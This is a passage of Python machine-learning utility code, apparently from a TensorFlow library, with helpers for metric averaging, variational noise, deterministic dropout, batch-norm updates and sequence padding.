ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in m.items():
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(lists_of_metrics.items()):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in m.items():
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(lists_of_per_example.items()):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
Keys must either exist in all metrics, in which it will be processed as a
weighted sum, or exist in only one metrics, in which case it will be copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set(
[k for loss_metrics, _ in loss_metric_weight_pairs for k in loss_metrics]) # pylint: disable=g-complex-comprehension
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
raise ValueError('Found metric %s which exists in more than one'
'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
def AddVN(p, x, per_step=False):
"""Add variational noise to x.
Args:
p: Layer params, with a `vn` subparam containing `VariationalNoiseParams`.
x: Input to add variational noise to.
per_step: Whether to add per_step noise.
Returns:
The input with variational noise added according to params.
"""
tensor_name = x.name if not tf.executing_eagerly() else '[eager]'
if per_step:
if not p.vn.per_step_vn:
tf.logging.info(
'p.vn.per_step_vn is not set. Not adding per-step vn to ' +
tensor_name)
return x
else:
if not p.vn.global_vn:
tf.logging.info('p.vn.global_vn is not set. Not adding global vn to ' +
tensor_name)
return x
tf.logging.info(
f"Add {'per-step' if per_step else 'global'} vn to {tensor_name}: {p.vn}")
if p.vn.scale is None:
raise ValueError('VN scale must be set.')
if p.vn.deterministic:
noises = DeterministicVN(p, tf.shape(x), mean=0.0, std=1.0)
noises = tf.cast(noises, x.dtype)
else:
if per_step:
# recurrent.py does not support stateful random ops in cell_fn due to
# rematerialization.
raise ValueError('per_step vn requires deterministic=True.')
noises = tf.random.normal(
tf.shape(x), stddev=1.0, seed=p.vn.seed, dtype=x.dtype)
scale = tf.where(GetGlobalStep() >= p.vn.start_step, p.vn.scale, 0.0)
return x + tf.cast(scale, x.dtype) * noises
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None,
deterministic=None,
start_step=0):
"""Returns a hyperparams for variational noise."""
if deterministic is None:
deterministic = cluster_factory.Current().in_unit_test
p = hyperparams.Params()
p.Define(
'scale', scale,
'Std of the variational noise to apply . This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
'Adds global variational noise every training setp iff True.')
p.Define('per_step_vn', per_step_vn,
'Adds per-timesetp variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
p.Define(
'deterministic', deterministic, 'If true, generate noise using'
'stateless random ops that are compatible with TF functional ops.')
p.Define(
'start_step', start_step,
'Step starting from which variational noise is added during training.')
return p
def DefaultVN():
return VariationalNoiseParams(scale=None)
# To disable VN of a layer, we use 1.0 in the first input parameter
# of the following function because otherwise it is the same to DefaultVN()
# which will be updated by parent configuration in CopyBaseParams()
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
# Step seed keyed by graph.
_STEP_SEED_DICT = ThreadLocalDict()
# The step seed will increment by np.prod(_STEP_SEED_INCREMENT.stack)
_STEP_SEED_INCREMENT = ThreadLocalStack()
@contextlib.contextmanager
def StepSeedIncrementContext(step):
"""Adds an element to _STEP_SEED_INCREMENT."""
assert step > 0, ('%s' % step)
_STEP_SEED_INCREMENT.stack.append(step)
try:
yield
finally:
_STEP_SEED_INCREMENT.stack.pop()
def GetStepSeed():
"""Gets step_seed."""
key = id(tf.get_default_graph())
if key not in _STEP_SEED_DICT.dict:
ResetStepSeed()
return _STEP_SEED_DICT.dict[key]
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
key = id(tf.get_default_graph())
_STEP_SEED_DICT.dict[key] = tf.convert_to_tensor(seed, dtype=tf.int64)
def MaybeResetStepSeedFromScope():
"""In graph mode, resets step_seed according to the current named scope.
This is used in graph mode to avoid "tensor is from a different graph"
errors that happen when we share random seend tensors too much.
See b/129159299 for more context.
Eager mode does not have this problem, so in eager mode we do nothing.
"""
if not tf.executing_eagerly():
ResetStepSeed(GenerateSeedFromName(tf.no_op(name='new_step_seed').name))
def MaybeResetStepSeed(seed):
"""If we're in graph mode, reset the step seed."""
if not tf.executing_eagerly():
ResetStepSeed(seed)
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
inc = np.prod(_STEP_SEED_INCREMENT.stack)
ResetStepSeed(step_seed + inc)
return step_seed
def GenerateStepSeedPair(p, op_seed=None):
"""Generates a seed pair for deterministic random operations in ...
functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(GetGlobalStep(), seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
op_seed = tf.cast(op_seed, seed_dtype)
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
raise tf.errors.InvalidArgumentError(
'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
def DeterministicVN(params, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
seeds = GenerateStepSeedPair(params, params.vn.seed)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.ops.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - tf.cast(
batch_norm_stats, batch_norm_var.dtype.base_dtype)) * decay
has_nan_or_inf = tf.reduce_any(
tf.math.logical_or(
tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
update_delta = tf.where(has_nan_or_inf, tf.zeros_like(update_delta),
update_delta)
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
if not tf.executing_eagerly_outside_functions():
bn_update_dict = _get_batch_norm_updates_dict()
if bn_update.name in bn_update_dict:
raise ValueError(f'BN update {bn_update.name} already exists.')
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
if tf.executing_eagerly_outside_functions():
return [], []
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
assert bn_update.name in bn_update_dict, (
f'{bn_update.name} is probably not a valid batch normalization update '
'op. Make sure batch normalization is done through calling'
' the py_utils.UpdateBatchNormVars helper routine.')
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
try:
_SAMPLE_STEP_STACK.stack.append(step)
yield step
finally:
_SAMPLE_STEP_STACK.stack.pop()
def _GetSampleStep():
return _SAMPLE_STEP_STACK.stack[-1] if _SAMPLE_STEP_STACK.stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
"""Apply a transform then sum the list."""
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
if not sum_transform:
return tf.constant(0.0)
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: v**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def ReduceRms(x: tf.Tensor) -> tf.Tensor:
"""Computes root mean square of tensor x with numerical stability."""
if not x.shape.is_fully_defined():
raise ValueError('Shape of x must be fully defined.')
if not x.shape.as_list():
return x
denom = functools.reduce((lambda x, y: x * y), x.shape.as_list())
if denom <= 1e8:
return tf.math.sqrt(tf.math.reduce_mean(tf.math.square(x)))
tf.logging.info('reduce_rms %s denom=%d', x, denom)
sum_square_x = tf.math.reduce_sum(tf.math.reduce_sum(tf.math.square(x), -1))
avg_square_x = sum_square_x / tf.constant(denom, dtype=sum_square_x.dtype)
return tf.math.sqrt(avg_square_x)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None, axis=1):
"""Pads x to `length` using `pad_val` along the axis dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the axis dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[axis] > length or
x.shape[i] != shape[i] where i != axis.
Args:
x: the tensor to be padded with axis dimension being the time. E.g., x
usually has shape [batch, seq_len, ...], when axis=1.
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
axis: The dimension that x will be padded, default to 1.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x, when axis=1, and similarly for other axes.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[axis]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[axis][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[axis]
pad_len = length - slen
pad = tf.scatter_nd([[axis, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[axis] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, use_select=True, ensure_shape=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x)
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must have a shape broadcastable to 'x' if specified.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
ensure_shape: If true, ensures the shape of the result is the same as of x.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.math.logical_or(
tf.equal(padding, tf.zeros([], padding.dtype)),
tf.equal(padding, tf.ones([], padding.dtype)))), [padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros([], x.dtype)
if padding.dtype != tf.bool:
padding = padding > tf.zeros([], padding.dtype)
result = tf.where_v2(padding, padded, x)
else:
result = x * tf.cast(1.0 - tf.cast(padding, tf.float32), x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
if ensure_shape:
result = tf.ensure_shape(result, x.shape)
return result
def LengthsFromPaddings(paddings, dtype=None):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x
Args:
paddings: a tensor with shape [batch, length].
dtype: A type to optionally cast the result to.
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
mask = 1 - tf.cast(paddings, tf.int32)
# We cannot just use `tf.reduce_sum(mask, axis=1)` to compute the number of
# elements prior to the trailing padding, because there might be leading
# padding. Thus, to identify the amount of trailing padding, we notice that
# the mask values for all the trailing padding will be zero, and thus in the
# cumsum below they will all be equal to the last element of the cumsum. Note
# that the final unpadded value will also be equal to the final cumsum value.
cumsum = tf.cumsum(mask, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements with the same value as the last cumsum value
# gives us num_trailing_paddings + 1, and so counting the number of elements
# that *differ* from the last cumsum value gives us the unpadded_length - 1.
unpadded_length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for when the mask is all zeros.
# In this case, all the entries in the cumsum will be equal to the last
# element, so the number that differ would be zero, and thus the
# unpadded_length value would be 1 (which is incorrect). We thus set it to 0.
all_zero_mask = tf.equal(tf.reduce_sum(mask, axis=1), 0)
result = tf.where(all_zero_mask, tf.zeros_like(unpadded_length),
unpadded_length)
if dtype and result.dtype != dtype:
result = tf.cast(result, dtype)
return result
def PaddingsFromLengths(lengths, maxlen=None):
"""Computes paddings Tensor from lengths.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x.
This method does not generate leading paddings.
Args:
lengths: A int32 Tensor of shape [B].
maxlen: None or a Python int or a scalar Tensor.
Returns:
A 0/1 valued Tensor of shape [B, maxlen or ?] where 1s are padded positions.
"""
lengths = HasRank(lengths, 1)
if maxlen is not None:
lengths = with_dependencies(
[assert_less_equal(tf.cast(tf.reduce_max(lengths), tf.int32), maxlen)],
lengths)
return 1. - tf.sequence_mask(lengths, maxlen=maxlen, dtype=tf.float32)
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.math.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lengths as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
# inpu0 and input1 should have the same batch size and same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.cast(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
input1_seq_dim = tf.cast(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(
seq_length0,
tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(
seq_length1,
tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def ShiftLeft(tensor, shift_size, pad_val=0, axis=1):
"""Shifts the values in a tensor to the left along the axis dimension.
The first shift_size values are dropped, and the tensor is padded on the
right with pad_val.
Args:
tensor: the input tensor with the axis dim being time.
shift_size: the number of frames >= 0 to shift.
pad_val: the value to pad on the right of the tensor.
axis: The dimension along which the tensor will be shifted, default to 1.
Returns:
A left shifted tensor on dimension axis.
"""
rank = tensor.shape.rank
with tf.control_dependencies(
[assert_greater_equal(rank, 2),
assert_greater_equal(shift_size, 0)]):
time = GetShape(tensor)[axis]
begin = tf.scatter_nd([[axis]], [shift_size], [rank])
return PadSequenceDimension(
tf.slice(tensor, begin, size=[-1] * rank), time, pad_val, axis=axis)
def CreateIdsAndLabels(ids, paddings, sos_id=1, eos_id=2, trim=False):
"""Creates ids and labels to be used as decoder targets.
Args:
ids: int Tensor of shape [batch, maxlen], without sos or eos.
paddings: float Tensor of shape [batch, maxlen].
sos_id: ID for the sos special token.
eos_id: ID for the eos special token.
trim: Whether to trim the last elements in the output Tensors, so that the
lenghts of the output Tensors are same as the input Tensors. Otherwise,
the output Tensors are longer than the input Tensors by one because of
the added sos / eos.
Returns:
A NestedMap with the following fields, where maxlen' equals maxlen when
trim=True, otherwise maxlen + 1:
- ids: int Tensor of shape [batch, maxlen'], with sos prepended.
- labels: int Tensor of shape [batch, maxlen'], with eos appended.
- paddings: float Tensor of shape [batch, maxlen'].
- weights: float Tensor of shape [batch, maxlen'].
"""
ids = tf.where(
tf.equal(paddings, 0.0), ids, tf.broadcast_to([[eos_id]], GetShape(ids)))
targets = NestedMap()
targets.ids = tf.pad(ids, [[0, 0], [1, 0]], constant_values=sos_id)
targets.labels = tf.pad(ids, [[0, 0], [0, 1]], constant_values=eos_id)
targets.paddings = tf.pad(paddings, [[0, 0], [1, 0]])
targets.weights = 1.0 - targets.paddings
if trim:
targets = targets.Transform(lambda v: v[:, :-1])
return targets
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
pad_after_contents: Whether to pad and trim after the original contents of
each dimension.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
if pad_after_contents:
# If dim_i is less than shape[i], pads after contents.
paddings = tf.stack([zeros, pad], axis=1)
# If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
slice_begin = zeros
else:
# If dim_i is less than shape[i], pads before contents.
